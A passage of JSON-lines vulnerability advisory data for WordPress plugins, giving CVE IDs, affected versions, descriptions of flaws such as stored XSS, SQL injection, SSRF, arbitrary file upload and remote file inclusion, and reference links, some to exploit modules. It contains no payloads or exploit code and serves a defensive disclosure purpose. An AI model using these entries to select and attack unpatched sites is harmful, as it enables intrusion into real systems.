replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-survey-and-poll\\\/trunk\\\/wordpress-survey-and-poll.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51cc6247-1948-4de1-b347-c7d818400777?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51cc6247-1948-4de1-b347-c7d818400777?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12610","slug":"school-management","versionImpact":"93.0.0","description":"The School Management System for Wordpress plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the 'mj_smgt_remove_feetype' and 'mj_smgt_remove_category_new' AJAX actions in all versions up to, and including, 93.0.0. This makes it possible for unauthenticated attackers to delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/school-management-system-for-wordpress\\\/11470032\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3a7ca0-9325-4b50-a844-8eeb4047de1a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c3a7ca0-9325-4b50-a844-8eeb4047de1a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2579","slug":"embed-lottie-player","versionImpact":"1.1.8","description":"The Lottie Player plugin for WordPress is vulnerable to Stored Cross-Site Scripting via File uploads in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the uploaded file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L130\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L82\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/embed-lottie-player\\\/tags\\\/1.1.8\\\/plugin.php#L82\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-lottie-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/embed-lottie-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b85b314d-a155-4cec-95c9-0db4b9d8e59b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b85b314d-a155-4cec-95c9-0db4b9d8e59b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6462","slug":"dl-yandex-metrika","versionImpact":"1.2","description":"The DL Yandex Metrika WordPress plugin through 1.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0880fa33-3efa-4f50-83c8-4c90cb805eb9\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0880fa33-3efa-4f50-83c8-4c90cb805eb9\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7059","slug":"simple-featured-image","versionImpact":"1.3.1","description":"The Simple Featured Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018slideshow\u2019 parameter in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-featured-image\\\/trunk\\\/templates\\\/slider.tpl.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simple-featured-image\\\/trunk\\\/templates\\\/slider.tpl.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-featured-image\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simple-featured-image\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4ecc01-7969-4ff6-8210-530835a43dbc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d4ecc01-7969-4ff6-8210-530835a43dbc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2012-10025","slug":"advanced-custom-fields","description":"The WordPress plugin Advanced Custom Fields (ACF) version 3.5.1 and below contains a remote file inclusion (RFI) vulnerability in core\/actions\/export.php. When the PHP configuration directive allow_url_include is enabled (default: Off), an unauthenticated attacker can exploit the acf_abspath POST parameter to include and execute arbitrary remote PHP code. This leads to remote code execution under the web server\u2019s context, allowing full compromise of the host.","refs":"[{\"url\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20121223025326\\\/http:\\\/\\\/secunia.com:80\\\/advisories\\\/51037\",\"name\":\"http:\\\/\\\/web.archive.org\\\/web\\\/20121223025326\\\/http:\\\/\\\/secunia.com:80\\\/advisories\\\/51037\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_advanced_custom_fields_exec.rb\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/rapid7\\\/metasploit-framework\\\/master\\\/modules\\\/exploits\\\/unix\\\/webapp\\\/wp_advanced_custom_fields_exec.rb\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-custom-fields\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-custom-fields\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d132d93b-509c-490d-8001-87147ed28c5e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d132d93b-509c-490d-8001-87147ed28c5e\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23856\",\"name\":\"https:\\\/\\\/www.exploit-db.com\\\/exploits\\\/23856\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.tenable.com\\\/plugins\\\/nessus\\\/63326\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/plugins\\\/nessus\\\/63326\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-advanced-custom-fields-remote-file-inclusion\",\"name\":\"https:\\\/\\\/www.vulncheck.com\\\/advisories\\\/wordpress-plugin-advanced-custom-fields-remote-file-inclusion\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/advanced-custom-fields\\\/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusion\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/wordpress-plugins\\\/advanced-custom-fields\\\/advanced-custom-fields-351-remote-code-execution-via-remote-file-inclusion\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0895","slug":"wp-coder","versionImpact":"2.5.3","description":"The WP Coder \u2013 add custom html, css and js code plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018id\u2019 parameter in versions up to, and including, 2.5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers with administrative privileges to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=2757782&old_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php&new=&new_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old=2757782&old_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php&new=&new_path=wp-coder%2Ftrunk%2Fadmin%2Fpartials%2Finclude-data.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b6a9cd-4d29-4bd8-afa3-b5d455ad8340\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4b6a9cd-4d29-4bd8-afa3-b5d455ad8340\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1919","slug":"wp-fastest-cache","versionImpact":"1.1.2","description":"The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_preload_single_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache-related settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024f4058-065b-48b4-a08a-d9732d4375cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/024f4058-065b-48b4-a08a-d9732d4375cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2893158\\\/wp-fastest-cache\\\/trunk\\\/wpFastestCache.php?contextall=1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5662","slug":"wp-sponsors","versionImpact":"3.5.0","description":"The Sponsors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sponsors' shortcode in all versions up to, and including, 3.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af04219-26c5-401d-94ef-11d2321f98bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4af04219-26c5-401d-94ef-11d2321f98bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sponsors\\\/tags\\\/3.5.0\\\/includes\\\/class-wp-sponsors-shortcodes.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-sponsors\\\/tags\\\/3.5.0\\\/includes\\\/class-wp-sponsors-shortcodes.php#L267\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1982","slug":"wpvivid-backuprestore","versionImpact":"0.9.68","description":"The Migration, Backup, Staging \u2013 WPvivid plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the get_restore_progress() and restore() functions in all versions up to, and including, 0.9.68. This makes it possible for unauthenticated attackers to exploit a SQL injection vulnerability or trigger a DoS.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4f17976e-d6b9-40fb-b2fb-d60bcfd68d12?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"name\":\"https:\\\/\\\/research.hisolutions.com\\\/2024\\\/01\\\/multiple-vulnerabilities-in-wordpress-plugin-wpvivid-backup-and-migration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fwpvivid-backuprestore%2Ftrunk&old=2667839&new_path=%2Fwpvivid-backuprestore%2Ftrunk&new=2667839\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1205","slug":"wemanage-app-worker","versionImpact":"1.2.0","description":"The Management App for WooCommerce \u2013 Order notifications, Order management, Lead management, Uptime Monitoring plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the nouvello_upload_csv_file function in all versions up to, and including, 1.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a4219c10-9d2a-429d-9ac7-61efc02bd4cf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller-functions.php#L982\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wemanage-app-worker\\\/trunk\\\/includes\\\/class-nouvello-wemanage-worker-api-wc-ext-controller.php#L166\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8987","slug":"youzify","versionImpact":"1.3.0","description":"The Youzify \u2013 BuddyPress Community, User Profile, Social Network & Membership Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's youzify_media shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19c463d1-41fa-4386-b755-a14d1e68c5bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/19c463d1-41fa-4386-b755-a14d1e68c5bd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.0\\\/includes\\\/public\\\/core\\\/functions\\\/general\\\/youzify-profile-functions.php#L910\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/youzify\\\/tags\\\/1.3.0\\\/includes\\\/public\\\/core\\\/functions\\\/general\\\/youzify-profile-functions.php#L910\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/youzify\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9642","slug":"editor-custom-color-palette","versionImpact":"3.3.7","description":"The Editor Custom Color Palette plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e7f858c-945c-4d12-a2a6-113449ad890a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9e7f858c-945c-4d12-a2a6-113449ad890a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/editor-custom-color-palette\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/editor-custom-color-palette\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/editor-custom-color-palette\\\/tags\\\/3.3.6\\\/asset\\\/eccp-custom-back-office.php#L1685\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/editor-custom-color-palette\\\/tags\\\/3.3.6\\\/asset\\\/eccp-custom-back-office.php#L1685\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11854","slug":"listdom","versionImpact":"3.7.0","description":"The Listdom \u2013 Business Directory and Classified Ads Listings WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018shortcode\u2019 parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listdom\\\/tags\\\/3.6.0\\\/templates\\\/search\\\/tpl.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/listdom\\\/tags\\\/3.6.0\\\/templates\\\/search\\\/tpl.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200502\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3200502\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listdom\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/listdom\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9ccb47c2-5f4b-45ea-9c48-0a9042a2fce6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12419","slug":"cf7-styler","versionImpact":"1.7.1","description":"The The Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.7.0. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. This functionality is also vulnerable to Reflected Cross-Site Scripting. Version 1.7.0 patched the Reflected XSS issue, however, the arbitrary shortcode execution issue remains.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L295\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L295\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L405\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cf7-styler\\\/tags\\\/1.6.9\\\/admin\\\/class-cf7-customizer-admin.php#L405\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d78ea71-5886-488e-a660-0dc25129a8b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d78ea71-5886-488e-a660-0dc25129a8b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-49333","slug":"hmenu","versionImpact":"1.16.5","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in NotFound Hero Mega Menu - Responsive WordPress Menu Plugin allows SQL Injection. This issue affects Hero Mega Menu - Responsive WordPress Menu Plugin: from n\/a through 1.16.5.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability-2?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/hmenu\\\/vulnerability\\\/wordpress-hero-menu-plugin-1-16-5-sql-injection-vulnerability-2?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1407","slug":"amo-team-showcase","versionImpact":"1.1.4","description":"The AMO Team Showcase plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's amoteam_skills shortcode in all versions up to, and including, 1.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amo-team-showcase\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/amo-team-showcase\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0950d3-4d7b-457a-8e67-df310d2712d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cf0950d3-4d7b-457a-8e67-df310d2712d4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13411","slug":"zapier","versionImpact":"1.5.1","description":"The Zapier for WordPress plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5.1 via the updated_user() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L114\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L114\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L210\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L210\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zapier\\\/trunk\\\/zapier.php#L284\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257975\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3257975\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zapier\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zapier\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701dc461-88e7-40bf-a4fb-f92723b6e05e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/701dc461-88e7-40bf-a4fb-f92723b6e05e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2543","slug":"advanced-accordion-block","versionImpact":"5.0.1","description":"The Advanced Accordion Gutenberg Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L363\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L363\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L364\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L364\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L369\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-accordion-block\\\/tags\\\/4.8.2\\\/advanced-accordion-block.php#L369\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-accordion-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/advanced-accordion-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79752ac3-cb5f-4d86-be58-c4b892e4edd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79752ac3-cb5f-4d86-be58-c4b892e4edd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
